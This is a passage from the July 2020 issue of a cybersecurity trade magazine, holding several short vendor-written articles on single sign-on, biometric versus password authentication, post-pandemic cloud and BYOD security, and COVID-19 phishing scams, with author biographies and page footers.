as they would use many accounts, many different locations and plenty of the machines getting their own<br />
web connectivity. In so many cases, it would be even the challenge identifying the threat as the entire<br />
search could be extremely time consuming. Once the first bad actor is found there are the better chances<br />
to locate the rest of his network.<br />
The Final Comments<br />
As we said, the kids love to play the games and the adult folks could keep with those habits the later on<br />
in their lives. Anyhow, our story can begin as quite innocent, but the impacts of the illustrated behavior<br />
could be enormous. In our understanding, it’s time to start to think if we want to make any progress as<br />
the human kind. The best way to use your brain cells is to observe so simple stuffs in your environment.<br />
Once you get aware what is going on around you – you would start correlating the things with each other<br />
and getting the rules of those linkages. The task is hard, but – in our opinion – so obtainable!<br />
About the Author<br />
Milica D. Djekic is an Independent Researcher from<br />
Subotica, Republic of Serbia. She received her engineering<br />
background from the Faculty of Mechanical Engineering,<br />
University of Belgrade. She writes for some domestic and<br />
overseas presses and she is also the author of the book<br />
“The Internet of Things: Concept, Applications and Security”<br />
being published in 2017 with the Lambert Academic<br />
Publishing. Milica is also a speaker with the BrightTALK<br />
expert’s channel. She is the member of an ASIS<br />
International since 2017 and contributor to the Australian<br />
<strong>Cyber</strong> Security Magazine since 2018. Milica's research<br />
efforts are recognized with Computer Emergency Response<br />
Team for the European Union (CERT-EU), Censys Press and EASA European Centre for <strong>Cyber</strong>security<br />
in Aviation (ECCSA). Her fields of interests are cyber defense, technology and business. Milica is a<br />
person with disability.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 99<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Everything You Want to Know About Single Sign-On<br />
By Ayman Totounji, Founder , Cynexlink<br />
Wikipedia defines Single sign-on or SSO as “an authentication scheme that allows a user to log in with a<br />
single ID and password to any of several related, yet independent, software systems.”<br />
Simply put, Single sign-on is a session or a user authentication service that allows a user to use a single<br />
set of login credentials—username and password—for multiple applications.<br />
Or you can say that you can gain access to several applications with just one set of passwords and<br />
usernames.<br />
This way, it simplifies password management for both businesses and individuals.<br />
An example of an SSO login is Google's products. For example, if you log into Gmail, you automatically<br />
get access to Google Drive, Google Photos, YouTube, and other Google services.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 100<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
How it Works<br />
Whenever you sign in to use an SSO service, the service creates an authentication token that remembers<br />
that you are verified. This authentication token is a sort of digital information being saved either in the<br />
user’s browsers or within the SSO service’s servers, like a temporary ID card provided to you.<br />
Any app that you access will be authenticated by the SSO service. The SSO approves the user's<br />
authentication token to the app and the user is granted access. But a user will be required to sign in<br />
through the SSO service if they haven't done it yet.<br />
However, an SSO service might not necessarily keep a user in its record, since it doesn't save user<br />
identities. Most SSO services work by checking user credentials with a different identity management<br />
service.<br />
SSO just confirms whether your login credentials match with their identity in the database, without looking<br />
after the database themselves—just like a record-keeper who can access the records easily without<br />
having the entire catalog memorized.<br />
I think these steps will help you understand better how Single Sign-On functions<br />
• The website first checks to see if you have already been approved by the SSO solution so that it<br />
can give you access to the site.<br />
• If you haven’t, it redirects you to the SSO tool to log in.<br />
• You are asked to fill credentials.<br />
• The SSO solution asks your identity provider or authentication system to confirm your identity.<br />
• The data is then transferred to the website by the SSO tool. It also takes you back to that site.<br />
• After the sign-in process, the site verifies authentication verification data with you as you pass<br />
through the site to confirm that you are authenticated each time you move to a new page.<br />
What are the Benefits of Single Sign-On?<br />
SSO lets users access all of their apps with a single set of passwords and usernames. Here I have<br />
discussed some benefits of Single Sign-On service.<br />
Increasing Productivity:<br />
SSO boosts productivity. When all of the apps are placed in one convenient portal, it accelerates access<br />
to required systems and resources.<br />
With SSO in place, a user needs to log in once and get one-click access to all the apps they require.<br />
Although the amount of time saved might seem small, all of the time generally spend logging into<br />
individual resources adds up.<br />
SSO also reduces the time users spend going through password-related hassles, since one only requires<br />
using a single set of a password. And this can make a difference when you have to manage some 40<br />
passwords. Isn't it?<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 101<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Therefore, users can focus on the important tasks rather than fiddling with multiple passwords.<br />
Minimizing Risk Associated with Bad Passwords Habits:<br />
Passwords can cut both ways. While they fortify your data, they can be used to steal all information if<br />
they get into the hands of a threat actor. That’s why they are also defined as a double-edged sword.<br />
Top of that, most passwords are not easy to remember and it is time-consuming to type into each<br />
resource you need to get into. While changing your passwords is important, it just adds to the frustration<br />
for some users.<br />
Enter SSO.<br />
If you use SSO, you are less likely to type password down, repeat passwords, make simple or commonly<br />
used passwords, or resort to other bad password practices.<br />
Minimizing Helpdesk Costs:<br />
Given that SSO minimizes the requirement to use the number of passwords, users are less likely to<br />
request the IT department for password resets. This can save time and hassles as resetting a simple<br />
password can eat up the helpdesk’s valuable time.<br />
According to one study, 20-50% of all help desk requests are for password resets. Providing a single set<br />
of credentials to employees will simply reduce this need.<br />
Improving Security Efficiencies:<br />
From the security viewpoint, it is quite obvious to be bothered by the use of the same password for all<br />
the apps. What if your master password is stolen?<br />
Yeah, keeping one password can make your systems vulnerable.<br />
And it is equally true that SSO can minimize password theft if used carefully.<br />
This is because users only need to remember a single password for many apps, meaning that they can<br />
focus on to make that single password secure and stronger.<br />
Plus, they are less likely to write it down, unlike in the case of multiple passwords that have to be noted<br />
down. This way, it minimizes the risk of password theft.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 102<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Understanding the Types of Single Sign-On<br />
• ENTERPRISE SINGLE SIGN-ON is considered a primary authentication, intercepting login<br />
requests when needed by secondary applications to complete the user and password fields. This<br />
system lets one system interacts with other systems that might disable the login screen.<br />
• WEB SINGLE SING ON or WEB SSO works with an application which can be accessed online,<br />
and its works to verify a user on multiple applications by eliminating the need of getting identified<br />
again.<br />
The proxy server then intercepts the access data as well as facilitates the communication<br />
following the transferring the results to the computer that requested it. Unidentified users are sent<br />
to an authentication service, returning a successful login.<br />
• FEDERATED IDENTITY relies on an identity management solution that utilizes standards to let<br />
application to identify clients without having them to go through the authentication process again<br />
and again.<br />
• OPEN ID is a decentralized SSO procedure that involves the storing of user IDS at a URL that<br />
any server can approve.<br />
What are the Challenges Associated with Single Sign-On<br />
• More robust passwords should be created. This is because if an SSO account is hacked, others<br />
under the same authentication can easily get exposed to the attack.<br />
• A breakdown with SSO at one site can affect all the linked sites. Therefore, it is important to<br />
choose the right SSO system. It should be reliable and equipped with the plans to deal with<br />
interruptions.<br />
• Your SSO is affected by the problem in your identity provider. The provider's weakness in any<br />
kind of interruption becomes your problem as well, and it might go beyond your control. Again,<br />
you need to work with an efficient vendor.<br />
• If a threat actor gets into your identity provider user account, all your linked systems are easily<br />
getting vulnerable. This can be termed as a classic single point of failure and should be addressed<br />
in the planning process. An efficient SSO provider ensures top-notch security.<br />
• It is not easy to set up SSO due to the different environments.<br />
• SSO is not recommended for the multi-user computers. After all, it causes sheer inconvenience<br />
and security issues if other users use a machine that has logged in accounts of someone.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 103<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
• Some SSO vendors can provide their data to third parties.<br />
How to Choose a Single Sign-On Solution<br />
There are some key factors to consider while choosing a Single Sign-On Solution.<br />
Personalized User Experience:<br />
Check if the vendor lets you customize the login page to your corporate branding. After all, an efficient<br />
single sign-on process doesn't confine the users in a box where everything looks alike.<br />
Access to all the Apps You Require:<br />
Make sure your sign-on vendor lets you use all the apps you require.<br />
Security:<br />
Security is a crucial point to look for in the vendor. Make sure they protect your password and let you<br />
integrate with AD/LDAP for quick access to your data. Reliability is also a key as the breakdown is often<br />
associated with these services. Therefore, make sure to work with the one who ensures nearly 100%<br />
uptime so that you can team can access their apps when they require them.<br />
Scalability:<br />
SSO solutions should grow with your organization. There is no use of changing the vendors now and<br />
then just because they are too big or too small for your needs.<br />
Bottom Line:<br />
So, you must have understood important things about SSO. It is a great solution to one big problem: how<br />
to manage the increasing number of users across a big ecosystem of apps and services.<br />
After all, it is not easy to memorize the complex passwords as we are using more systems in our routine<br />
lives.<br />
It lets us log in to different applications and services with just one single identity. It eliminates the need to<br />
repeat access to each account each time you get to disconnect from the service.<br />
However, an SSO service is not immune to some issues such as breakdown and comprised passwords.<br />
Luckily, these things can be avoided by using strong passwords as well as working with an efficient SSO<br />
vendor.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 104<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
About the Author<br />
Ayman is founder of cynexlink. When Ayman founded Cynexlink, he<br />
had one core mission in mind: helping small- and mid-sized companies<br />
spend more time focusing on their core businesses. Could we impress<br />
you with his technical background? With his engineering degree from<br />
Damascus University, as a CCNP, CCVP, CCNA, CCDA, Cisco IPTX<br />
and VoIP specialist, being MCSE and A+ certified and having nearly 20<br />
years of experience in enterprise network design and architecture,<br />
network routing, switching, wireless, security, Cisco Unified messaging,<br />
CCME, UC500 Series, voice gateway and Cisco Unity – yes, we think<br />
we could.<br />
Ayman can be reached online at (aat@cynexlink.com) and at our company website -<br />
https://www.cynexlink.com<br />
LinkedIn | Twitter | 949.668.0682<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 105<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
A Passwordless Future: Will Biometric Identification<br />
Replace Passwords?<br />
By Joshua Frisby, Founder of PasswordManagers.co<br />
From Face ID to scanning your fingerprint to unlock your phone, biometric authentication is weaved into<br />
almost every device that we rely on. It has been so seamlessly integrated that it has become somewhat<br />
second-nature in the digitally dominant world that we live in.<br />
While not needing to enter, or remember, a password is extremely convenient, we must ask: Will<br />
biometric authentication replace traditional passwords altogether? And most importantly: Is it safe?<br />
We have become so accustomed to using biometric authentication but the truth is that while biometrics<br />
offer many advantages, it also comes with several drawbacks. Let’s take a closer look.<br />
Is There a Need to Replace Passwords?<br />
Login details and credentials are susceptible to theft and are often targeted by hackers. In fact, Verizon’s<br />
Data Breach Investigations Report concluded that up to 81% of data breaches are due to hackers being<br />
able to gain access by leveraging weak, reused, or stolen passwords. With the level of exposure to<br />
cybercrime dependent on where you reside, having a fool-proof method to login into your accounts is<br />
crucial to secure digital infrastructures, devices, and identities.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 106<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
According to research conducted by LastPass, the average person can have up to 97 work-related<br />
passwords that they need to manage, and that’s not even including personal ones. It’s no shock that so<br />
many people reuse the same password, after all, we are only human. Unless you are a genius and have<br />
the world’s best memory, it’s highly likely that you are going to be able to remember so many, let alone<br />
come up with complex combinations to ensure you use unique strong passwords for each account.<br />
With cybercrime on the rise, 55% of people would prefer a method of protecting accounts that don’t<br />
involve passwords. Enter biometric authentication.<br />
What Makes Biometrics a Good Alternative?<br />
Biometric data is unique to you, making it hard to steal and imitate. And so, biometrics are a serious<br />
contender for replacing passwords as the standard login method.<br />
Not only are we familiar with using our biometric data (face and fingerprint) to unlock our devices and in<br />
some cases, a handful of accounts, they also make the login process effortless. There is no need to type<br />
usernames or long complicated passwords. Take mobile banking apps as an example, what could be<br />
more convenient than simply scanning your finger on a reader to see your account balance? Or, even<br />
simpler, look at your phone’s camera to unlock your device via the built-in iris scanner.<br />
Source: Science Focus<br />
While convenience is nice to have, security is the primary concern. Because biometrics are more difficult<br />
to replicate than passwords, hackers cannot obtain your sensitive data with a simple phishing attack.<br />
This makes hacking data that is protected with biometrics much more difficult than password-protected<br />
data.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 107<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
We’ve touched on face-scanning but it is far more sophisticated than you may think. Facial recognition is<br />
rapidly gaining popularity and the algorithms that are used to analyze someone’s facial features are also<br />
becoming increasingly intelligent. For example, some facial recognition applications can differentiate a<br />
live subject from a picture, making it very difficult to spoof the facial recognition and gain unauthorized<br />
access to protected data.<br />
Capital is another driving force behind the development of biometrics. The biometrics market is estimated<br />
to be worth a staggering $49 billion by 2022 and huge investments are being made in the development<br />
of new algorithms and systems to improve biometric accuracy.<br />
Biometric authentication was first introduced to the mass market by smartphones such as the Apple<br />
iPhone and Samsung’s Galaxy range. Today, it is possible to use biometrics across a much broader<br />
range of applications. However, biometrics are not limited to devices and software, we can also use them<br />
to access physical spaces like our homes. This versatility makes for a better overall authentication<br />
method than passwords, especially when speed, ease of login, and security are all concerns.<br />
If biometrics are a better authentication method, why are we still using passwords? The answer is that<br />
biometrics are not perfect and they do have significant drawbacks that need to be addressed before we<br />
can fully embrace the passwordless revolution. While the technology is very promising and convenient,<br />
there’s certainly room for improvement before biometrics can claim to enjoy the same popularity that<br />
passwords do.<br />
What Are the Drawbacks of Biometric Authentication?<br />
While biometrics are very secure, they are also immutable.<br />
It is important to remember that biometric data has to be stored somewhere for applications to use it as<br />
an authentication method. The problem is that if these databases were to be hacked, your identity could<br />
become compromised.<br />
If your biometric data is ever compromised in one way or another, you could face serious repercussions.<br />
You can change passwords, you can’t change biometrics.<br />
Since biometrics can’t be changed, it would be impossible to ensure the safety of compromised accounts<br />
once hacked. This is where passwords have the upper hand. If your password is ever lost or stolen, you<br />
can simply log in to your account and change your credentials to make it secure again. This process can<br />
be repeated over and over again.<br />
Biometric authentication also comes with quite a few privacy concerns. Since biometrics inextricably link<br />
a user’s digital and physical identity, there are concerns that biometric data could be collected and abused<br />
by hackers. Since data privacy is a key concern, this could cap how widely biometric authentication is<br />
accepted as more people become aware of the potential downsides.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 108<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Source: Apple Insider<br />
It is also important to note that biometric authentication systems have not been around as long as<br />
password-based systems. Consequently, they suffer from more bugs and growing pains. False positives<br />
or negatives occur frequently, and this can lead to frustration when an authorized user is denied access<br />
or, more seriously, when the wrong person is granted access due to a false positive identification. A<br />
research team from New York University created an artificial intelligence platform that was able to<br />
successfully recreate full fingerprints from partial prints. The recreated fingerprints were able to fool a<br />
biometric authentication system 20% of the time.<br />
Last but not least, biometric authentication systems can often be biased against users who cannot easily<br />
submit biometrics. This includes handicapped people who may have experienced a change in their<br />
biometric details due to an injury. For example, a badly cut finger may lead to scarring that makes a<br />
fingerprint unrecognizable, and as a result, revokes access.<br />
Passwords Are Here to Stay<br />
Although the use of passwordless methods are on the rise, it seems that passwords will remain the<br />
mainstream authentication method for the near future. So, to make using passwords as simple and<br />
secure as possible, there are a few simple steps you can take.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 109<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
The key to having optimal online security is to ensure that all your passwords are unique and complex.<br />
It’s easy to base your passwords on something that is of personal significance to you such as your<br />
birthday or the name of a loved one, but this makes passwords easy to guess and is a hacker’s dream.<br />
Using a password generator to create complex passwords that cannot be guessed with ease is a simple<br />
and quick way to strengthen the security of your online accounts. But, to take the security of your<br />
passwords to the next level, you can store them in a fortified password vault cocooned in encryption.<br />
There’s a wide range of different password managers that can facilitate the secure storage of passwords<br />
whilst also offering the convenience of auto-filling credentials, making logging into sites as seamless as<br />
biometric authentication.<br />
You should also ensure that you never write down your passwords, save them in spreadsheets, or share<br />
them over text or email. Hackers can easily exploit these unsecure methods. Changing passwords<br />
frequently also makes your accounts more secure and helps to keep hackers at bay.<br />
Although biometric authentication doesn’t appear to be replacing passwords in the near future, perhaps<br />
the best authentication method is a hybrid one in which passwords and biometrics co-exist to deliver a<br />
comprehensive security solution.<br />
About the Author<br />
Joshua Frisby is the Founder of PasswordManagers.co. His mission<br />
is to help you protect your passwords. Whether you want to securely<br />
manage passwords for personal, family, or business use,<br />
PasswordManagers.co is here to help you stay safe. Josh can be<br />
reached via email or LinkedIn.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 110<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Post COVID-19: Cloud, Remote Work and BYOD Security<br />
Predictions<br />
By Anurag Kahol, CTO and co-founder, Bitglass<br />
Cloud adoption has already been growing rapidly, but we’ll see a sharp increase in adoption in<br />
<strong>2020</strong> as a result of the global pandemic.<br />
Recent events have impacted businesses and schools all around the world, causing them to shift to<br />
remote work wherever possible. Cloud adoption gives employees and students the freedom to operate<br />
from the safety of their homes by granting remote access to needed data and services. However, even<br />
before the outbreak, cloud adoption was outpacing the adoption of the tools needed to properly protect<br />
data in cloud environments. In 2019, 86% of organizations deployed cloud-based tools, but a mere 34%<br />
made use of single sign-on (SSO), a basic but critical capability for authenticating users and securing<br />
access to corporate cloud environments. This statistic suggests deeper underlying cloud security issues<br />
within organizations and indicates that data breaches will continue to arise around the world.<br />
The shift to widespread remote work also increases the likelihood of insider threats.<br />
Verizon’s 2019 Data Breach Investigation Report found that approximately 34% of breaches involved<br />
internal actors. Additionally, a recent survey conducted on IT professionals about insider threats revealed<br />
that only half of organizations provide user training regarding insider threats. While protecting data from<br />
malicious external actors is typically top of mind for most organizations, the fact remains that they must<br />
also defend against employees--whether they are malicious or merely careless.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 111<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Phishing attacks are not a groundbreaking threat, and general employee awareness of these schemes<br />
has grown in recent years; however, hackers still find success with this tactic by taking advantage of<br />
major news. In fact, the United Nations' health agency released an alert warning of an increased number<br />
of cybercriminals posing as World Health Organization (WHO) representatives amid the current<br />
pandemic. During this stressful time, recipients of these messages are more likely to click on malicious<br />
URLs, open attachments, and give up personal data. Because of this, insider threats will spike and be a<br />
leading cause of data breaches in <strong>2020</strong>.<br />
Businesses will implement changes to ensure BYOD devices are secure.<br />
A majority of organizations (85%) were already somewhat prepared for remote work by enabling bring<br />
your own device (BYOD) policies. On the flipside, not all companies that have adopted BYOD are doing<br />
so securely. For example, 43% of businesses do not know if the devices employees are using to access<br />
corporate data are infected with malware--demonstrating a disturbing lack of visibility. By the end of <strong>2020</strong>,<br />
we will likely see even higher BYOD adoption rates--whether out of necessity for enabling remote work,<br />
or simply for BYOD’s many benefits, including enhanced mobility, efficiency, and employee satisfaction.<br />
Regardless, when companies enable BYOD, they must also implement agentless security measures that<br />
can protect corporate data on personal devices. With agentless tools, IT gains security and compliance<br />
without invading user privacy through agents on employees’ personal endpoints. As organizations<br />
increasingly realize that cybersecurity must be a top priority, we predict that the use of agentless security<br />
solutions will rise alongside that of BYOD.<br />
About the Author<br />
Anurag is the CTO and co-founder of Bitglass where he<br />
expedites the company’s technology direction and<br />
architecture. Anurag was director of engineering in Juniper<br />
Networks’ Security Business Unit before co-founding Bitglass.<br />
Anurag received a global education, earning an M.S. in<br />
computer science from Colorado State University, and a B.S.<br />
in computer science from the Motilal Nehru National Institute<br />
Of Technology.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 112<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
The Rise of COVID-19 Phishing Attacks: How <strong>Cyber</strong><br />
Adversaries Are Adopting Phishing to Generate New<br />
Threat Vectors<br />
By Brad Slavin, CEO of DuoCircle LLC<br />
While COVID-19 has locked all people in their homes, with office premises closed, cyber adversaries<br />
seem to have a field day using the pandemic as a launchpad for phishing attacks. Organizations and<br />
individuals must be aware of the detective, preventive, and protective measures to safeguard their<br />
information assets against these attacks.<br />
As the COVID-19 pandemic assumes global proportions, it is natural for people to become anxious.<br />
People naturally turn to the internet to acquire the latest information on the coronavirus related drugs,<br />
vaccines, etc. At the same time, social engineering attacks have been on the rise as malicious actors<br />
worldwide keep developing sophisticated tools and techniques to entice employees as well as individuals<br />
to reveal sensitive and confidential information, such as personally identifiable information (PII), financial<br />
data, or user account credentials. Let's dive deep into the gravity of the situation before discussing what<br />
the best anti-phishing solutions and techniques are that organizations and individuals can make use of.<br />
Some Hard Facts and Statistics on Phishing Attacks Based On COVID-19<br />
Researchers reveal that cybercriminals are primarily employing three ingenious phishing attack<br />
methodologies to target victims. They are brand impersonation, scamming, and business email<br />
compromise (BEC). Here are a few spine-chilling statistics on COVID-19 phishing scams that have made<br />
headlines around the world.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 113<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
• There has been an unprecedented rise in phishing scams with more than 854,000 confirmed<br />
phishing and counterfeit web-pages reported in Q1 of <strong>2020</strong>. Besides, more than 4 million pages<br />
fall in the category of suspicious pages.<br />
• The alarming issue is that nearly 30% of these confirmed phishing pages (approximately more<br />
than a quarter of a million) pertain to COVID-19 alone.<br />
• Though the first COVID-19 related phishing scam surfaced by the end of January <strong>2020</strong>, the figure<br />
for March <strong>2020</strong> alone is 9,116, a 667% increase over February <strong>2020</strong>.<br />
• Eighteen million malware and phishing emails and more than 240 million COVID-19-related spam<br />
email messages are sent over Gmail daily.<br />
• Citizens in the US have lost somewhere around $12 million to coronavirus phishing attacks. And<br />
in the UK, it's over £2 million.<br />
Healthcare - The Most Vulnerable Industry Domain to Phishing Attacks<br />
COVID-19 has kept the entire world on tenterhooks. The FUD (the fear, uncertainty, and doubt) and the<br />
non-availability of a reliable cure or vaccine is the primary reason for the panic created in people's minds.<br />
Thus, when they encounter an email message seemingly originating from an influential source like the<br />
US Center for Disease Control and Prevention, WHO, or other prominent health agencies, people rarely<br />
check their authenticity. Recently, there has been a surge of phishing emails sent by these malicious<br />
actors impersonating healthcare professionals and organizations, making healthcare one of the most<br />
vulnerable sectors in coronavirus times.<br />
Offer for Loans and Grants - The Most Effective COVID-19 Phishing Attack<br />
The pandemic has thrown the world economy in disarray. It has affected almost every segment of society.<br />
Under these circumstances, people eagerly look forward to Governmental aid such as EMI moratoriums,<br />
loans, and other giveaways. Malicious actors have been taking advantage of these situations and are<br />
trying to lure people to fictitious websites, where the unsuspecting users end up providing vital information<br />
leading to severe data breaches. These attacks are seen in the form of phishing emails, ransomware, or<br />
banking malware attacks.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 114<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Donation Solicitations - The Most Dangerous COVID-19 Phishing Scam<br />
Global pandemics like COVID-19 bring out the humanitarian side of people in a substantial way.<br />
Generally, people donate generously towards their respective National Disaster Relief Funds, and<br />
research funds set up by their governments. There have been numerous incidents of cybercriminals<br />
taking advantage of such philanthropic activities. One of the most notorious modus operandi is to design<br />
fundraising pages that not only mislead users into donating money but also steal sensitive personal<br />
information. Using such information, like names, email addresses, phone numbers, credit card details,<br />
and internet banking usernames and passwords, these malicious actors accept money using the names<br />
of disaster relief funds.<br />
COVID-19 Vaccine and Cure Scam - The Most Ingenious COVID-19 Phishing Attack<br />
While researchers are struggling to find an antidote for the coronavirus, numerous fake websites<br />
advertising medicines and vaccines have sprung up on the internet. More than 20,000 new COVID-19-<br />
related domains have been registered in the past few weeks. These websites also claim to sell COVID-<br />
19 personal protective kits like face masks, sanitizers, hand gloves, medical combinations like<br />
Hydroxychloroquine, Remdesivir, and so on. Such fraudulent websites ask for the full payment in<br />
advance and unsuspecting people end up parting with their money only to discover that they have been<br />
a victim of cybercrime. Amazon itself reported over a million fake products in this category over the past<br />
couple of months.<br />
Detective, Preventive and Protective Measures Individuals & Enterprises Can Adopt<br />
<strong>Cyber</strong>criminals play on the psychology of the victim by pushing in email messages with COVID-19 related<br />
information that come along with a malicious attachment or infectious URL. Knowing some of these<br />
threats could be the best defense in thwarting such attempts:<br />
• Reliance on Trusted Sources: Rely on authentic or official websites to get reliable information and<br />
updates about the coronavirus. Be scrupulous in clicking on the links provided on articles and<br />
blogs that share information on COVID-19.<br />
• Refrain from The Temptation To Click/Download: Sometimes, ignoring unsolicited emails is the<br />
best phishing prevention method. Downloading or opening malicious attachments or clicking on<br />
an infectious URL allows malicious actors to gain access to network systems.<br />
• Knowing the Phishing Techniques: The latest tactic deployed by malicious actors is to set up live<br />
tracker websites from which people can purportedly get live coronavirus updates. Though the<br />
websites appear legitimate, they are scamming attempts that end up with the user compromising<br />
their confidential information.<br />
• Phishing Protection Solutions: The best way to deal with phishing threats is to install a trusted<br />
anti-phishing solution to thwart any attempt made by adversaries.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 115<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
• Phishing Awareness: Phishing awareness training plays an integral part in safeguarding<br />
information assets. Enterprises should educate and train their employees, customers, and thirdparty<br />
vendors on types of phishing, anti-phishing techniques, and phishing prevention best<br />
practices, etc.<br />
Post COVID-19 – What Does the Future Look Like?<br />
With the lockdown restrictions in place almost everywhere, a significant proportion of people already have<br />
their presence online, from shopping, ordering food, and essential items to work from home. The shift to<br />
a virtual workplace has become more pronounced than before, as a majority of online businesses are<br />
already allowing their employees to WFH, which are likely to follow suit post COVID-19 as well,<br />
considering the numerous benefits and overall increase in the productivity of the employees.<br />
As a downside, though, cyber adversaries have seized the opportunity to target as many people as<br />
possible. Hence, one can expect a surge in phishing attacks and scams in times to come. Therefore, one<br />
should exercise extreme caution and neutralize the vulnerabilities to mitigate the information risks<br />
encountered because of COVID-19. Deploying an effective anti-phishing solution is the need of the hour<br />
to tackle these attacks better, and has never been so significant.<br />
About the Author<br />
Brad Slavin,CEO of DuoCircle LLC. Brad Slavin is a security<br />
industry veteran and the General Manager at DuoCircle LLC a cloud<br />
email security firm. Before joining DuoCircle, Brad began his career<br />
in network security by founding a regional ISP in California and was<br />
the cofounder of wireless wardriving and security software<br />
Netstumber.com; Which was the recipient of the "Editor's Choice" -<br />
Laptop Magazine & Ziff-Davis i3 Award for innovation.<br />
Brad can be reached online at https://www.linkedin.com/in/bradslavin/ and our company website<br />
https://www.phishprotecion.com<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 116<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Post COVID-19: Password Extinction Accelerated;<br />
Telemedicine Spurs Fraud<br />
By Robert Prigge, CEO of Jumio<br />
Passwords will become extinct much faster than predicted.<br />
As the COVID-19 pandemic pushed more of us to self-isolate, Zoom became the go-to teleconferencing<br />
platform. In fact, Zoom went from 10 million daily meetings in December to 300 million today.<br />
Unfortunately, this surge in popularity came with a price tag — a lack of data privacy. Now, there are over<br />
500,000+ stolen Zoom logins floating around the dark web for just .002 cents each. And this is just<br />
opening the door for account takeover (ATO) attacks via credential stuffing — a type of cyberattack where<br />
automated bots use those stolen account credentials to gain unauthorized access to user accounts. And<br />
Zoom is not alone. We’ve also seen a rash of account takeover attempts aimed at users of Microsoft’s<br />
proprietary Remote Desktop Protocol (RDP), striking millions per week.<br />
With data collected and sold on the dark web containing usernames and passwords from past breaches,<br />
and internet users often recycling the same login credentials across multiple platforms, cybercriminals<br />
have all of the tools they need to impersonate a user’s identity online. This means that if your online<br />
account is only protected by a username and password, then you’re likely going to be an ATO target. As<br />
a result, password-based authentication, multi-factor authentication (2FA) and knowledge-based<br />
authentication (KBA) will be a thing of the past much sooner than previously anticipated, and businesses<br />
will look to more sophisticated and secure login options for current and prospective users.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 117<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Telemedicine will open up new threat vectors for fraud.<br />
Given the health concerns involved with physically visiting a doctor or hospital during COVID-19, patients<br />
have been urged to stay home unless symptoms are considered severe. Because of this, telemedicine<br />
